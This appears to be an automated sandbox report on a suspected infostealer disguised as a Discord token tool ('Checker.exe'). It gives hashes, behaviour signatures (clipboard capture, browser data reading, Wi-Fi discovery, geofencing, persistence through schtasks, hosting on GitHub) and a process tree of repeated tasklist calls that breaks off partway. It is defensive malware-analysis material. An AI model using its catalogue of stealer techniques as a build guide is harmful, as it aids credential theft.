Overview
overview
7Static
static
3Token Join...rd.exe
windows7-x64
7Token Join...rd.exe
windows10-2004-x64
7$PLUGINSDI...ls.dll
windows7-x64
3$PLUGINSDI...ls.dll
windows10-2004-x64
3$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3Checker.exe
windows7-x64
1Checker.exe
windows10-2004-x64
7LICENSES.c...m.html
windows7-x64
3LICENSES.c...m.html
windows10-2004-x64
3d3dcompiler_47.dll
windows10-2004-x64
1ffmpeg.dll
windows7-x64
1ffmpeg.dll
windows10-2004-x64
1libEGL.dll
windows7-x64
1libEGL.dll
windows10-2004-x64
1libGLESv2.dll
windows7-x64
1libGLESv2.dll
windows10-2004-x64
1resources/elevate.exe
windows7-x64
3resources/elevate.exe
windows10-2004-x64
3vk_swiftshader.dll
windows7-x64
1vk_swiftshader.dll
windows10-2004-x64
1vulkan-1.dll
windows7-x64
1vulkan-1.dll
windows10-2004-x64
1$PLUGINSDI...7z.dll
windows7-x64
3$PLUGINSDI...7z.dll
windows10-2004-x64
3Analysis
-
max time kernel
66s -
max time network
161s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16/11/2024, 23:49
Static task
static1
Behavioral task
behavioral1
Sample
Token Join Discord.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
Token Join Discord.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/System.dll
Resource
win7-20241023-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
Checker.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
Checker.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
LICENSES.chromium.html
Resource
win7-20241010-en
Behavioral task
behavioral10
Sample
LICENSES.chromium.html
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
d3dcompiler_47.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral12
Sample
ffmpeg.dll
Resource
win7-20240903-en
Behavioral task
behavioral13
Sample
ffmpeg.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral14
Sample
libEGL.dll
Resource
win7-20240903-en
Behavioral task
behavioral15
Sample
libEGL.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral16
Sample
libGLESv2.dll
Resource
win7-20240903-en
Behavioral task
behavioral17
Sample
libGLESv2.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral18
Sample
resources/elevate.exe
Resource
win7-20241010-en
Behavioral task
behavioral19
Sample
resources/elevate.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral20
Sample
vk_swiftshader.dll
Resource
win7-20240903-en
Behavioral task
behavioral21
Sample
vk_swiftshader.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral22
Sample
vulkan-1.dll
Resource
win7-20240903-en
Behavioral task
behavioral23
Sample
vulkan-1.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral24
Sample
$PLUGINSDIR/nsis7z.dll
Resource
win7-20241010-en
Behavioral task
behavioral25
Sample
$PLUGINSDIR/nsis7z.dll
Resource
win10v2004-20241007-en
General
-
Target
Checker.exe
-
Size
164.7MB
-
MD5
3c52730a2553bdfd48259cfad6c11b85
-
SHA1
71f45f724ac58823dcf075d3979b7bb841d78324
-
SHA256
fa8032f79660bd6cac0fc70a3493e714317e8a1d51233f9af8035eefe9da8760
-
SHA512
dcd783db9555362f83e46ebaacc77454618331397582f25eb27a42fc4d54fbf52d7373109b47adde43e705dcd5cf9014986c29778378342d560296b53c413608
-
SSDEEP
1572864:1xGeD65iMor30uXkaYCELW0ejTV1FQ3mRVvHTxnHqVstmZC/wu32Q/djfP85WhkF:AeJEhTWTjiWhS
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation Checker.exe -
Clipboard Data 1 TTPs 64 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 728 cmd.exe 9196 cmd.exe 6044 powershell.exe 8360 cmd.exe 8284 cmd.exe 9228 cmd.exe 6772 cmd.exe 5632 powershell.exe 2352 cmd.exe 6508 cmd.exe 8004 powershell.exe 7772 cmd.exe 8888 cmd.exe 5984 cmd.exe 10180 cmd.exe 3440 powershell.exe 6828 cmd.exe 3216 cmd.exe 4348 powershell.exe 7888 powershell.exe 10556 cmd.exe 368 powershell.exe 10848 powershell.exe 7568 powershell.exe 7684 cmd.exe 4056 cmd.exe 6500 cmd.exe 3140 powershell.exe 1364 cmd.exe 4724 powershell.exe 7196 cmd.exe 6872 powershell.exe 8452 cmd.exe 3912 cmd.exe 392 powershell.exe 5600 powershell.exe 8868 powershell.exe 5556 powershell.exe 3808 cmd.exe 4944 powershell.exe 3096 powershell.exe 7784 powershell.exe 8412 powershell.exe 8268 cmd.exe 8780 powershell.exe 2784 powershell.exe 5884 cmd.exe 10312 powershell.exe 4280 powershell.exe 5660 powershell.exe 7936 cmd.exe 2200 cmd.exe 1232 cmd.exe 8728 powershell.exe 4460 powershell.exe 9708 powershell.exe 2880 cmd.exe 7156 cmd.exe 8460 powershell.exe 10924 powershell.exe 10408 cmd.exe 9084 powershell.exe 8008 powershell.exe 3692 powershell.exe -
Loads dropped DLL 2 IoCs
pid Process 2572 Checker.exe 2572 Checker.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
pid Process 8952 powershell.exe 11052 powershell.exe 8860 powershell.exe 10472 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 59 raw.githubusercontent.com 62 raw.githubusercontent.com 65 raw.githubusercontent.com 67 raw.githubusercontent.com 68 raw.githubusercontent.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 35 ipinfo.io 36 ipinfo.io -
Enumerates processes with tasklist 1 TTPs 64 IoCs
pid Process 7892 tasklist.exe 8584 tasklist.exe 8992 tasklist.exe 8068 tasklist.exe 8328 tasklist.exe 8600 tasklist.exe 7508 tasklist.exe 7436 tasklist.exe 7736 tasklist.exe 7904 tasklist.exe 7860 tasklist.exe 1812 tasklist.exe 6432 tasklist.exe 7516 tasklist.exe 7396 tasklist.exe 8088 tasklist.exe 6124 tasklist.exe 8368 tasklist.exe 5620 tasklist.exe 7576 tasklist.exe 8576 tasklist.exe 8560 tasklist.exe 6752 tasklist.exe 4072 tasklist.exe 5572 tasklist.exe 7572 tasklist.exe 9652 tasklist.exe 5996 tasklist.exe 7492 tasklist.exe 7676 tasklist.exe 7980 tasklist.exe 7588 tasklist.exe 8252 tasklist.exe 9016 tasklist.exe 7348 tasklist.exe 7852 tasklist.exe 7844 tasklist.exe 8268 tasklist.exe 6416 tasklist.exe 6156 tasklist.exe 8200 tasklist.exe 3968 tasklist.exe 9284 tasklist.exe 9076 tasklist.exe 7284 tasklist.exe 8568 tasklist.exe 7184 tasklist.exe 7924 tasklist.exe 7348 tasklist.exe 7696 tasklist.exe 7620 tasklist.exe 7304 tasklist.exe 9084 tasklist.exe 7952 tasklist.exe 8156 tasklist.exe 7468 tasklist.exe 7972 tasklist.exe 7916 tasklist.exe 8300 tasklist.exe 10656 tasklist.exe 452 tasklist.exe 7552 tasklist.exe 8452 tasklist.exe 8076 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
pid Process 7860 cmd.exe 3064 powershell.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 8624 cmd.exe 8596 netsh.exe -
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Checker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Checker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Checker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 Checker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz Checker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString Checker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 Checker.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 10388 WMIC.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 8032 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 2572 Checker.exe 2572 Checker.exe 2572 Checker.exe 2572 Checker.exe 2572 Checker.exe 2572 Checker.exe 5292 powershell.exe 5292 powershell.exe 5292 powershell.exe 8388 powershell.exe 8388 powershell.exe 8388 powershell.exe 10564 powershell.exe 10564 powershell.exe 10564 powershell.exe 10564 powershell.exe 11052 powershell.exe 11052 powershell.exe 8860 powershell.exe 8860 powershell.exe 11052 powershell.exe 8860 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5100 tasklist.exe Token: SeShutdownPrivilege 2572 Checker.exe Token: SeCreatePagefilePrivilege 2572 Checker.exe Token: SeIncreaseQuotaPrivilege 848 WMIC.exe Token: SeSecurityPrivilege 848 WMIC.exe Token: SeTakeOwnershipPrivilege 848 WMIC.exe Token: SeLoadDriverPrivilege 848 WMIC.exe Token: SeSystemProfilePrivilege 848 WMIC.exe Token: SeSystemtimePrivilege 848 WMIC.exe Token: SeProfSingleProcessPrivilege 848 WMIC.exe Token: SeIncBasePriorityPrivilege 848 WMIC.exe Token: SeCreatePagefilePrivilege 848 WMIC.exe Token: SeBackupPrivilege 848 WMIC.exe Token: SeRestorePrivilege 848 WMIC.exe Token: SeShutdownPrivilege 848 WMIC.exe Token: SeDebugPrivilege 848 WMIC.exe Token: SeSystemEnvironmentPrivilege 848 WMIC.exe Token: SeRemoteShutdownPrivilege 848 WMIC.exe Token: SeUndockPrivilege 848 WMIC.exe Token: SeManageVolumePrivilege 848 WMIC.exe Token: 33 848 WMIC.exe Token: 34 848 WMIC.exe Token: 35 848 WMIC.exe Token: 36 848 WMIC.exe Token: SeIncreaseQuotaPrivilege 848 WMIC.exe Token: SeSecurityPrivilege 848 WMIC.exe Token: SeTakeOwnershipPrivilege 848 WMIC.exe Token: SeLoadDriverPrivilege 848 WMIC.exe Token: SeSystemProfilePrivilege 848 WMIC.exe Token: SeSystemtimePrivilege 848 WMIC.exe Token: SeProfSingleProcessPrivilege 848 WMIC.exe Token: SeIncBasePriorityPrivilege 848 WMIC.exe Token: SeCreatePagefilePrivilege 848 WMIC.exe Token: SeBackupPrivilege 848 WMIC.exe Token: SeRestorePrivilege 848 WMIC.exe Token: SeShutdownPrivilege 848 WMIC.exe Token: SeDebugPrivilege 848 WMIC.exe Token: SeSystemEnvironmentPrivilege 848 WMIC.exe Token: SeRemoteShutdownPrivilege 848 WMIC.exe Token: SeUndockPrivilege 848 WMIC.exe Token: SeManageVolumePrivilege 848 WMIC.exe Token: 33 848 WMIC.exe Token: 34 848 WMIC.exe Token: 35 848 WMIC.exe Token: 36 848 WMIC.exe Token: SeShutdownPrivilege 2572 Checker.exe Token: SeCreatePagefilePrivilege 2572 Checker.exe Token: SeShutdownPrivilege 2572 Checker.exe Token: SeCreatePagefilePrivilege 2572 Checker.exe Token: SeDebugPrivilege 7460 tasklist.exe Token: SeDebugPrivilege 7356 tasklist.exe Token: SeDebugPrivilege 7436 tasklist.exe Token: SeDebugPrivilege 7348 tasklist.exe Token: SeDebugPrivilege 7284 tasklist.exe Token: SeDebugPrivilege 7412 tasklist.exe Token: SeDebugPrivilege 7668 tasklist.exe Token: SeDebugPrivilege 7536 tasklist.exe Token: SeDebugPrivilege 7468 tasklist.exe Token: SeIncreaseQuotaPrivilege 7800 WMIC.exe Token: SeSecurityPrivilege 7800 WMIC.exe Token: SeTakeOwnershipPrivilege 7800 WMIC.exe Token: SeLoadDriverPrivilege 7800 WMIC.exe Token: SeSystemProfilePrivilege 7800 WMIC.exe Token: SeSystemtimePrivilege 7800 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2572 Checker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2572 wrote to memory of 3456 2572 Checker.exe 88 PID 2572 wrote to memory of 3456 2572 Checker.exe 88 PID 3456 wrote to memory of 5100 3456 cmd.exe 90 PID 3456 wrote to memory of 5100 3456 cmd.exe 90 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5084 2572 Checker.exe 91 PID 2572 wrote to memory of 5016 2572 Checker.exe 92 PID 2572 wrote to memory of 5016 2572 Checker.exe 92 PID 2572 wrote to memory of 540 2572 Checker.exe 284 PID 2572 wrote to memory of 540 2572 Checker.exe 284 PID 540 wrote to memory of 848 540 cmd.exe 96 PID 540 wrote to memory of 848 540 cmd.exe 96 PID 2572 wrote to memory of 3932 2572 Checker.exe 97 PID 2572 wrote to memory of 3932 2572 Checker.exe 97 PID 2572 wrote to memory of 4720 2572 Checker.exe 98 PID 2572 wrote to memory of 4720 2572 Checker.exe 98 PID 2572 wrote to memory of 4428 2572 Checker.exe 99 PID 2572 wrote to memory of 4428 2572 Checker.exe 99 PID 2572 wrote to memory of 1004 2572 Checker.exe 100 PID 2572 wrote to memory of 1004 2572 Checker.exe 100 PID 2572 wrote to memory of 1232 2572 Checker.exe 101 PID 2572 wrote to memory of 1232 2572 Checker.exe 101 PID 2572 wrote to memory of 4044 2572 Checker.exe 102 PID 2572 wrote to memory of 4044 2572 Checker.exe 102 PID 2572 wrote to memory of 4900 2572 Checker.exe 103 PID 2572 wrote to memory of 4900 2572 Checker.exe 103 PID 2572 wrote to memory of 4928 2572 Checker.exe 104 PID 2572 wrote to memory of 4928 2572 Checker.exe 104 PID 2572 wrote to memory of 2300 2572 Checker.exe 105 PID 2572 wrote to memory of 2300 2572 Checker.exe 105 PID 2572 wrote to memory of 912 2572 Checker.exe 106 PID 2572 wrote to memory of 912 2572 Checker.exe 106 PID 2572 wrote to memory of 1652 2572 Checker.exe 107 PID 2572 wrote to memory of 1652 2572 Checker.exe 107 PID 2572 wrote to memory of 4452 2572 Checker.exe 108 PID 2572 wrote to memory of 4452 2572 Checker.exe 108 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1900 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Checker.exe"C:\Users\Admin\AppData\Local\Temp\Checker.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:3456 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5100
-
-
-
C:\Users\Admin\AppData\Local\Temp\Checker.exe"C:\Users\Admin\AppData\Local\Temp\Checker.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\menstruum" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1800 --field-trial-handle=1812,i,17893640996960591007,2971762690342059213,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:22⤵PID:5084
-
-
C:\Users\Admin\AppData\Local\Temp\Checker.exe"C:\Users\Admin\AppData\Local\Temp\Checker.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\menstruum" --mojo-platform-channel-handle=2040 --field-trial-handle=1812,i,17893640996960591007,2971762690342059213,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:82⤵PID:5016
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=2572 get ExecutablePath"2⤵
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Windows\System32\Wbem\WMIC.exewmic process where processid=2572 get ExecutablePath3⤵
- Suspicious use of AdjustPrivilegeToken
PID:848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3932
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4720
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4428
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1004
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1232
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4044
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4900
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4928
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2300
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:912
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1652
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4452
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:368
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3320
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4600
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1324
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3296
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:428
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1496
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7712
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2028
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3188
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2656
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7744
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2752
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1528
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3936
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4880
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1176
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4744
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2180
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2172
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4640
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5032
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3692
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3948
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3548
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2060
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1824
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:964
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4032
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5096
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8268
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3180
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2948
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2868
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1976
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4316
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2112
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7892
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4328
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3532
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1308
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2632
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4028
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4476
-
C:\Windows\system32\tasklist.exetasklist3⤵
